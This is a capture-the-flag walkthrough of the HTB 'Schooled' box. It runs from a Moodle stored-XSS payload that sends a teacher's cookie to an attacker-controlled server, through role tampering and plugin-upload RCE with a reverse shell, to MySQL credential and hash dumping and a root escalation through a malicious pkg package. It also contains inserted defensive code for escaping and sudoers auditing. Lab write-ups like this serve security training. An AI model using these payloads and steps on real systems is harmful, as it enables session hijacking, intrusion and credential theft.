
Schooled HTB - Writeup


Hey guys, Styx here. In this write-up I'll walk you through the steps to root the Schooled box. This box is rated medium and is, in my opinion, a realistic scenario. Hopefully this write-up can be of educational value to you.

Let's get into it!

# Start Enum #

Like every pen-test, we start off with some reconnaissance: we scan for open ports and services exposed by the target machine. In the picture you can see the Nmap results.
 
nmap output
In the Nmap results we see that our target has 2 ports open.

The first thing I tried was checking for content on port 80, but content discovery on the initial port led nowhere, so let's enumerate possible subdomains.

 

## SUBDOMAIN ENUM ##

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://schooled.htb/ -H 'Host: FUZZ.schooled.htb' -fs 20750

A very useful and quick tool to perform this enumeration is FFUF. Check it out on GitHub.

As you can see in the pic above, we got a hit on a subdomain called 'moodle'! To have our machine direct us to this subdomain, add moodle.schooled.htb to your hosts file.

When browsing to the subdomain we come across a Moodle 3.9 installation. Moodle is a free and open-source learning management system written in PHP. For those that wish to learn more, check out their website:

click --> HERE

Now that we know what we are dealing with, we can move on.

Let's create an account and see what functionality we can find.

So set up your account and log in.

When logged in we have limited rights within the application.
So we need to find a way to elevate our privileges within the application.
 

A way we can do this is by exploiting an XSS vulnerability in the edit profile section of the application.

When looking at the available posts, we got a little nudge from the creator of this box!


This announcement is very interesting because our teacher here hints at the 'MoodleNet profile'. This is where we can inject our XSS payload. This teacher will be checking the profiles of students that enroll in his course. The dedication of this guy! We can steal his cookie and hijack his session!

Let's head over to our profile and look for the MoodleNet profile.

Insert your XSS payload in the MoodleNet profile section.

The payload I used to catch the teacher's cookie is:

<img src=x onerror=this.src='http://<YOUR_IP>:8000/?'+document.cookie;>

Spin up a quick HTTP server by running:

python3 -m http.server 8000 

Now that our XSS payload is set, we need the teacher to look at our profile to trigger the XSS and steal his cookies. All we need to do is enroll in the math course. When you do that, give it a second or two and watch the request come in!

XSS triggered and the teacher loses his cookies :P

So replace your cookie with the teacher's cookie.


Boom! We hijacked the teacher's session!
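For the defending side of this step, here is an added example (my own code, not the author's and not part of Moodle) showing the three things that would have blunted this attack: escaping the profile field on output turns the payload above into inert text, an HttpOnly flag on the session cookie keeps document.cookie from reading it even when a script does run, and a coarse triage regex helps find payloads that are already stored in profile fields. The function names and the ATTACKER_IP placeholder are assumptions made for this example.

```python
import html
import re

# Constructed copy of the payload shown in the write-up, with a placeholder
# host; it is only used here as input to the checks below.
PROFILE_PAYLOAD = "<img src=x onerror=this.src='http://ATTACKER_IP:8000/?'+document.cookie;>"


def render_profile_field(value: str) -> str:
    """Escape a free-text profile field before it goes into an HTML page.

    After escaping, the browser shows the payload as literal text instead of
    building an <img> element whose onerror handler runs.
    """
    return html.escape(value, quote=True)


def looks_like_script_injection(value: str) -> bool:
    """Coarse triage check for values already stored in a profile field:
    flags tags, inline event handlers and javascript: URLs for manual review."""
    return bool(re.search(r"<\s*\w+|\bon\w+\s*=|javascript:", value, re.IGNORECASE))


def audit_set_cookie(set_cookie: str) -> list[str]:
    """Return the hardening attributes missing from a Set-Cookie header value.

    HttpOnly is the one that matters for this attack: browsers do not expose
    HttpOnly cookies through document.cookie, so an injected script cannot
    read the session id even when the XSS itself succeeds.
    """
    parts = set_cookie.split(";")[1:]
    attrs = {p.strip().split("=", 1)[0].lower() for p in parts if p.strip()}
    missing = []
    for name in ("HttpOnly", "Secure", "SameSite"):
        if name.lower() not in attrs:
            missing.append(name)
    return missing


if __name__ == "__main__":
    print(render_profile_field(PROFILE_PAYLOAD))
    print(looks_like_script_injection(PROFILE_PAYLOAD))
    print(audit_set_cookie("MoodleSession=abc123; path=/"))
```

The escaping function is the one that belongs in the application; the other two are what an admin would run against existing data and against the app's response headers to see whether the same trick would work today.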

Anyway, let's move on.

When researching Moodle I came across the latest RCE!
You can find it over ---> HERE.

So in order to get this exploit to work we need to find a way to upload a zip file containing a PHP file that will be installed as a plugin. But to do that we need more privileges within the application. So let's get into the next steps.

### Becoming Admin ###

So the next step is to gain access to the admin panel of the Moodle installation.

So what we need to do is head over to the Maths section, browse to Participants and manually add a user. From what we've seen on the site, Lianne is a manager.


Manually add Lianne as a user. Intercept the request and change the user id and role id to 24 (the id of our teacher) and 1 (manager/administrator) respectively. This will elevate our privileges.

un-edited request

edited request


When logged in as Lianne you can head over to the site administration panel.

When looking at the PoC on GitHub you can see that we can add more privileges to our account by copying and pasting the payload into the request when editing the manager role.


Intercepted request when saving the manager role permissions. The blue highlight shows where to paste the PoC.

copy from HERE

When you have successfully updated the privileges, you now have the ability to install plugins.


Let's head over to this function and exploit it to gain access to the machine.

Find the exploit over HERE.

When uploaded you can head over to:

http://schooled.htb/blocks/rce/lang/en/block_rce.php?cmd=id

Browsing through the exploit, we see that it provides us with a simple PHP web shell.


So we now have a foothold on the box. But let's upgrade our web shell to a reverse shell. To do that we need to modify the block_rce.php file to set up a reverse shell instead.

  1. Unzip the file and modify block_rce.php into your standard pentestmonkey PHP reverse shell.
  2. Zip the files back up with: zip -r -q styx.zip rce/
  3. Upload the zip, set up your listener and browse to: http://moodle.schooled.htb/moodle/blocks/rce/lang/en/block_rce.php


AND WE'RE IN!


## LOCAL ENUM ##


So we can now start our local enumeration process to see if we can escalate our privileges on the system.

During our local enumeration we found MySQL credentials!



This file contained MySQL credentials, which allowed us to enumerate the database for password hashes. So after firing our queries we have some password hashes! The queries can be found in the SQL QUERIES section should you need help.


### creds ###

moodle:PlaybookMaster2020

### SQL QUERIES ###

/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e 'show databases;'

/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e 'show tables from moodle;'

/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -e 'use moodle;select * from mdl_user;'

# Priv esc #

Access to the MySQL db turned out to be fruitful. Looking at the hashes present, we see that the user Jamie is an admin. We could try to crack all of them, but Jamie being a more privileged user will get us deeper into the system.

So create a file, paste Jamie's hash from the database into it and fire up John to crack it.


We got a HIT!!

Jamie's password = !QAZ2wsx

Now we can SSH into Jamie's account!

One of the first things I like to check is sudo -l.

It turns out that Jamie is allowed to run sudo on the following commands:

/usr/sbin/pkg update
/usr/sbin/pkg install *


Let's do some research!

Based on this article here, we can adapt it to create a custom package and install it using sudo to root this box!



With this script we can automate the creation of our .txz file and spice it up with our own goodies. Transfer the script to the target machine and run it as jamie. This will create the mypackage-2.05.txz file.

So to root the box all we have to do is:
  1. Set up a netcat listener on the attacking machine.
  2. Run: sudo pkg install --no-repo-update *.txz
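From the defending side, the root cause here is a sudoers rule with a wildcard argument handed to a package manager. As an added example (my own code, not from the write-up or the article it links), here is a small audit that parses `sudo -l` style output and flags exactly that pattern. The sample output is constructed for this example: only the two pkg lines mirror what the write-up shows for jamie, the other rules are made up so the audit has something benign to compare against, and the `(runas) TAGS: command args` line shape is the assumed input format.

```python
import re

# Constructed sample in the shape of `sudo -l` output. Only the two pkg lines
# mirror the rules the write-up shows for jamie; the rest are made up.
SAMPLE_SUDO_L = """\
User jamie may run the following commands on this host:
    (ALL) NOPASSWD: /usr/sbin/pkg update
    (ALL) NOPASSWD: /usr/sbin/pkg install *
    (root) /usr/sbin/service apache24 restart
    (root) /usr/local/bin/backup.sh
"""

# Commands that install software: handing one of these a user-chosen package
# means that package's install scripts run as root.
PACKAGE_MANAGERS = {"pkg", "apt", "apt-get", "dpkg", "rpm", "yum", "dnf", "zypper", "pip", "pip3"}

# One rule line: "(runas) [TAG: ...] command [args]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<command>\S+)\s*(?P<args>.*?)\s*$"
)


def parse_sudo_l(text: str) -> list[dict]:
    """Turn the rule lines of `sudo -l` output into dicts; header lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        rules.append({
            "runas": m.group("runas"),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "command": m.group("command"),
            "args": m.group("args"),
        })
    return rules


def risky_rules(rules: list[dict]) -> list[tuple[dict, list[str]]]:
    """Return (rule, reasons) for every rule that effectively grants root."""
    flagged = []
    for rule in rules:
        reasons = []
        base = rule["command"].rsplit("/", 1)[-1]
        has_wildcard = any(ch in rule["args"] for ch in "*?[")
        if rule["command"] == "ALL":
            reasons.append("unrestricted command list")
        if has_wildcard:
            # sudoers globs also match whitespace, so "*" cannot keep extra
            # options or paths out of the permitted command line.
            reasons.append("wildcard in arguments: extra options and paths cannot be excluded")
        if base in PACKAGE_MANAGERS and has_wildcard:
            reasons.append("package manager may install an arbitrary local package, whose install scripts run as root")
        if reasons:
            flagged.append((rule, reasons))
    return flagged


if __name__ == "__main__":
    for rule, reasons in risky_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(rule["command"], rule["args"], "->", "; ".join(reasons))
```

On the sample, `pkg update` passes and `pkg install *` is flagged twice, which is the right outcome: the fix is either to drop the install rule or to pin it to exact package names from the configured repository rather than a glob.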
 

And we are root!

I hope you enjoyed this box as much as I did, and hopefully this write-up was useful to you.

See you in the next one!

Cheers - Styx









